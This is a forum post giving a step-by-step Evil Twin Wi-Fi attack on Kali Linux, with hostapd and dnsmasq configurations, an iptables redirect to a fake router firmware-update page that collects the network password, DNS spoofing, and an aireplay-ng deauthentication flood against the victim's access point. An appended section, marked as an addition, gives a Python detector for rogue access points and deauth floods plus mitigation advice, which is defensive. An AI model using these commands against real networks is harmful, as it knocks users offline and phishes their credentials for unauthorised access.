Soty, posted January 9

Evil Twin attack without using any additional hardware (maybe an external NIC)

Using a Debian-based operating system (Kali).

The goal of the attack is to knock the Wi-Fi clients offline, make them reconnect to a fake access point with the same name (most of the time they will reconnect automatically, as long as it has exactly the same name), then redirect the packets to our firmware update page and ask them for the password, to make access to the network easier later.

I am not going to go over configuring apache2/nginx or even a small backend application. Google it.
I am not going to go over how to set up a database. Google it.
Questions are welcome, but I will probably tell you to look it up on Google.

STEP BY STEP IN THE KALI TERMINAL

1- sudo apt install hostapd dnsmasq apache2

2- iwconfig [iface] mode monitor

3- mkdir evil-twin && cd evil-twin

4- vim hostapd.conf
   -> interface = [iface]
   -> driver = [drivername] #usually works with nl80211
   -> ssid = [essid of target]
   -> hw_mode =g
   -> channel = [channel of target]
   -> macaddr_acl = 0
   -> ignore_broadcast_ssid = 0

5- vim dnsmasq.conf
   -> interface = [iface]
   -> dhcp-range = 192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
   -> dhcp-option=3, 192.168.1.1
   -> dhcp-option=6, 192.168.1.1
   -> server = 8.8.8.8
   -> log-queries
   -> log-dhcp
   -> listen-address=127.0.0.1

6- ifconfig [iface] up 192.168.1.1 netmask 255.255.255.0

7- route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

8- iptables --table nat --append PREROUTING -i [iface] -p tcp -j REDIRECT --to-ports <ports running ur portal>

9- setting up the portal
   This will require you to have some social engineering skills and some basic frontend knowledge, and u'll have to do some reconnaissance, probably know the brand of the router to emulate a firmware update. I will not link any samples. I recommend you use httrack to copy a relevant website and play with the HTML/CSS, maybe set up a small backend app with the scripting language of your choice, and maybe set up apache/nginx to serve the app or redirect the victim to ur dev server. Ur choice.

10- u might need to set up a database at this point, or just configure the backend so that the user input is saved in some file

11- hostapd hostapd.conf

12- dnsmasq -C dnsmasq.conf -d

13- dnsspoof -i [iface]

14- aireplay-ng --deauth 0 -a [victim's bssid] [iface] #wifi ddos
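A defender's view of the steps in the post above, as an added example that is not part of the original post: it flags an access point that reuses a known SSID and a burst of deauthentication frames, then correlates the two. The SSID, BSSIDs, thresholds and sample observations are constructed assumptions; the security check relies on the posted hostapd.conf setting no WPA options, which makes the look-alike network open.

```python
from collections import defaultdict

# Assumed inventory of the legitimate network: SSID -> (allowed BSSIDs, expected security).
KNOWN = {"CorpWiFi": ({"aa:bb:cc:00:00:01"}, "WPA2")}

def find_rogue_aps(beacons, known=KNOWN):
    """Flag beacons that reuse a known SSID from an unknown BSSID or with the wrong security."""
    findings = {}
    for ssid, bssid, security in beacons:
        if ssid not in known:
            continue
        allowed, expected = known[ssid]
        reasons = []
        if bssid not in allowed:
            reasons.append("unknown BSSID")
        if security != expected:
            reasons.append(f"security {security} != {expected}")
        if reasons:
            findings[bssid] = reasons
    return findings

def deauth_floods(frames, window=1.0, threshold=10):
    """Return BSSIDs that sent at least `threshold` deauth frames within `window` seconds."""
    times = defaultdict(list)
    for ts, bssid in sorted(frames):
        times[bssid].append(ts)
    flooded = set()
    for bssid, seen in times.items():
        start = 0
        for end, ts in enumerate(seen):
            while ts - seen[start] > window:  # slide the window start forward
                start += 1
            if end - start + 1 >= threshold:
                flooded.add(bssid)
    return flooded

def evil_twin_alerts(beacons, frames, known=KNOWN):
    """Alert when a legitimate BSSID is being flooded while a look-alike AP is on air."""
    rogues, flooded = find_rogue_aps(beacons, known), deauth_floods(frames)
    alerts = []
    for ssid, (allowed, _) in known.items():
        twins = sorted({b for s, b, _ in beacons if s == ssid and b in rogues})
        if twins and flooded & allowed:
            alerts.append((ssid, twins))
    return alerts

# Constructed sample observations: (ssid, bssid, security) and (timestamp, source bssid).
BEACONS = [("CorpWiFi", "aa:bb:cc:00:00:01", "WPA2"), ("CorpWiFi", "de:ad:be:ef:00:02", "OPEN"),
           ("CoffeeShop", "11:22:33:44:55:66", "OPEN")]
FRAMES = [(i * 0.05, "aa:bb:cc:00:00:01") for i in range(40)] + [(5.0, "aa:bb:cc:00:00:09")]
```

On the client side, WPA3 or 802.11w protected management frames make the forged deauthentication in step 14 ineffective, and users should treat a sudden open network with a familiar name as suspect.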